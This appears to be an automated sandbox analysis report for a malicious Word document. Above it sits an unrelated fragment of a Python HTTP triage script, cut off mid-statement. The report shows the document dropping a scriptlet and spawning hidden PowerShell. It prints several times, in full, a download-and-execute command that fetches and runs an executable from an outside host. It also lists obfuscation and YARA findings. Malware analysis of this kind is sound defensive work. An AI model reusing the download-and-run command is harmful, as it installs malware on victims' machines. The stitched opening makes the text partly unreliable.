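        b"Last-Modified: Fri, 14 Jan 2022 05:56:32 GMT\r\nConnection: keep-alive\r\n"
        b"ETag: \"61e11090-2f800\"\r\nAccept-Ranges: bytes\r\n\r\n") + PE_STUB

if __name__ == "__main__":
    for req in (REQ_WITH_UA, REQ_NO_UA, REQ_JPEG):
        print(req.split(b"\r\n", 1)[0].decode(), triage_request(req))
    print(triage_response(RESP))
```

The ETag check is a cheap way to tell a static file served by nginx from a generated or proxied response: a match says the server handed out the same on-disk file each time (the three responses above also share the ETag), while a mismatch points at something rewriting headers in front of the file.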

System Summary:

Microsoft Office creates scripting files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe
Document contains OLE streams with names of living off the land binaries
Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr Stream path '_1703660897/\x01Ole10Native' : 4{....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaD.\abdtfhghgeghDp..ScT.< (the remainder of the stream is non-printable and was rendered as a run of '.')
Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr Stream path '_1703660925/\x01Ole10Native' : $|....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..z (the remainder of the stream is non-printable and was rendered as a run of '.')
..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Document contains a stream with embedded javascript code
Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr Stream path '_1703660897/\x1Ole10Native' : Found JS content: 4{....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT..... ...C:\CbkepaD.\abdtfhghgeghDp..ScT.<...
Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr Stream path '_1703660925/\x1Ole10Native' : Found JS content: $|....abdtfhgXgeghDp..ScT.C:\nsdsTggH\abdtfhgXGeghDp..ScT.....6...C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp..ScT..z...
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\okcff.exe
.NET source code contains very large array initializations
Source: 41.0.okcff.exe.400000.5.unpack, <PrivateImplementationDetails>{FF1D0D87-84BB-46D1-97D2-B6B1FCD58796}/252DC26E-1C55-40FB-95BA-CAC79903EF30.cs Large array initialization: .cctor: array initializer size 11933
Source: 41.0.okcff.exe.400000.7.unpack, <PrivateImplementationDetails>{FF1D0D87-84BB-46D1-97D2-B6B1FCD58796}/252DC26E-1C55-40FB-95BA-CAC79903EF30.cs Large array initialization: .cctor: array initializer size 11933
Source: 41.0.okcff.exe.400000.9.unpack, <PrivateImplementationDetails>{FF1D0D87-84BB-46D1-97D2-B6B1FCD58796}/252DC26E-1C55-40FB-95BA-CAC79903EF30.cs Large array initialization: .cctor: array initializer size 11933
Source: 41.0.okcff.exe.400000.13.unpack, <PrivateImplementationDetails>{FF1D0D87-84BB-46D1-97D2-B6B1FCD58796}/252DC26E-1C55-40FB-95BA-CAC79903EF30.cs Large array initialization: .cctor: array initializer size 11933
Found suspicious RTF objects
Source: abdtfhgXgeghDp.ScT Static RTF information: Object: 0 Offset: 000007CDh abdtfhgXgeghDp.ScT
Yara signature match
Source: 9.2.okcff.exe.334b4b0.4.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000005.00000002.438152998.00000000003A0000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 00000003.00000002.436663453.0000000000380000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Document has an unknown application name
Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr OLE indicator application name: unknown
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_003D2519 9_2_003D2519
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_003D4D79 9_2_003D4D79
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_02110940 9_2_02110940
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_02110E00 9_2_02110E00
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_0218D148 9_2_0218D148
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_0218778F 9_2_0218778F
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_02184B98 9_2_02184B98
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_0218A8D0 9_2_0218A8D0
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_02187F38 9_2_02187F38
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_02188D88 9_2_02188D88
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_02189022 9_2_02189022
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_02184EC8 9_2_02184EC8
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_02185C80 9_2_02185C80
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_021A4AB0 9_2_021A4AB0
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_0542A0E3 9_2_0542A0E3
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_0542B370 9_2_0542B370
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_0542AEC0 9_2_0542AEC0
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_0542A12A 9_2_0542A12A
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_0542A807 9_2_0542A807
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_0542A8F2 9_2_0542A8F2
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_0542AF82 9_2_0542AF82
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_0542078A 9_2_0542078A
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 41_2_00205330 41_2_00205330
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 41_2_00206350 41_2_00206350
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 41_2_00202099 41_2_00202099
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 41_2_00205678 41_2_00205678
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Document contains no OLE stream with summary information
Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr OLE indicator has summary info: false
PE file contains strange resources
Source: okcff[1].exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: okcff.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\okcff.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\okcff.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\timeout.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\okcff.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\okcff.exe Memory allocated: 76E90000 page execute and read and write
Source: 478644.doc Virustotal: Detection: 41%
Source: 478644.doc ReversingLabs: Detection: 30%
Source: C:\Users\user\AppData\Roaming\okcff.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ..................................0.e.c.(.P.....................p...............................e. ...............&.......................ms....
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ..................................0.e.c.(.P.....................p.......q.......................e. ...............&.......................ms....
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ....................\.............W.a.i.t.i.n.g. .f.o.r. .2.............T.......................................................................
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .....................J.......................
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ..................................1.e.c.(.P.....x...............................................e. .......................................@s....
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ..................................0.e.c.(.P.....x...............................................e. .......................................@s....
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ..................................0.e.c.(.P.....x...............................................e. .......................................@s....
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ..................................W.a.i.t.i.n.g. .f.o.r. .2.............B.......................0...............(.&.............................
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ................................ .s.e.c.o.n.d.s.,. .p.r.e.s.s. .a. .k.e.y. .t.o. .c.o.n.t.i.n.u.e. .............(.&.....J.......................
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ..................................1.e.c.(.P.....................................................e. .............(.&.......................ls....
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ..................................0.e.c.(.P.............................. ......................e. .............(.&.......................ls....
Source: C:\Windows\SysWOW64\timeout.exe Console Write: ..................................0.e.c.(.P.............................. ......................e. .............(.&.............h.........ls....
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\okcff.exe "C:\Users\user\AppData\Roaming\okcff.exe"
Source: C:\Users\user\AppData\Roaming\okcff.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Users\user\AppData\Roaming\okcff.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Users\user\AppData\Roaming\okcff.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Users\user\AppData\Roaming\okcff.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
Source: C:\Users\user\AppData\Roaming\okcff.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Users\user\AppData\Roaming\okcff.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Users\user\AppData\Roaming\okcff.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Users\user\AppData\Roaming\okcff.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Users\user\AppData\Roaming\okcff.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C timeout 2
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 2
Source: C:\Users\user\AppData\Roaming\okcff.exe Process created: C:\Users\user\AppData\Roaming\okcff.exe C:\Users\user\AppData\Roaming\okcff.exe
Source: C:\Windows\System32\verclsid.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD2-48AA-11D2-8432-006008C3FBFC}\InprocServer32
Source: C:\Users\user\AppData\Roaming\okcff.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$478644.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRF70A.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@53/21@4/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\okcff.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr OLE document summary: edited time not present or 0
Source: 41.0.okcff.exe.400000.5.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 41.0.okcff.exe.400000.7.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 41.0.okcff.exe.400000.9.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\okcff.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBBa?p source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: protobuf-net.pdbSHA256 source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
Source: Binary string: protobuf-net.pdb source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Yara detected Costura Assembly Loader
Source: Yara match File source: 9.2.okcff.exe.1e30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.okcff.exe.35871d0.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.okcff.exe.1e30000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.okcff.exe.35871d0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.623662053.000000000356F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.621443805.00000000023AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.621033509.0000000001E30000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: okcff.exe PID: 2656, type: MEMORYSTR
Suspicious powershell command line found
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_003D863D pushfd ; ret 9_2_003D8641
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_003D7F95 pushad ; retn 001Ch 9_2_003D7F99
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_003D7FF5 pushfd ; retn 001Ch 9_2_003D8049
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_003D87E0 pushad ; ret 9_2_003D8849
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_0211EBEB push esp; retn 001Ch 9_2_0211EBF5
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_02181163 pushad ; ret 9_2_02181429
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_02181464 pushad ; ret 9_2_02181429
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_02189840 push FFFFFF8Bh; ret 9_2_02189843
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_021ABD19 pushfd ; iretd 9_2_021ABD25
Source: C:\Users\user\AppData\Roaming\okcff.exe Code function: 9_2_054297B4 push 850FD83Bh; ret 9_2_054297C1
Binary contains a suspicious time stamp
Source: okcff[1].exe.0.dr Static PE information: 0xF603599A [Sun Oct 17 00:04:42 2100 UTC]

Persistence and Installation Behavior:

Tries to download and execute files (via powershell)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\okcff.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\okcff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
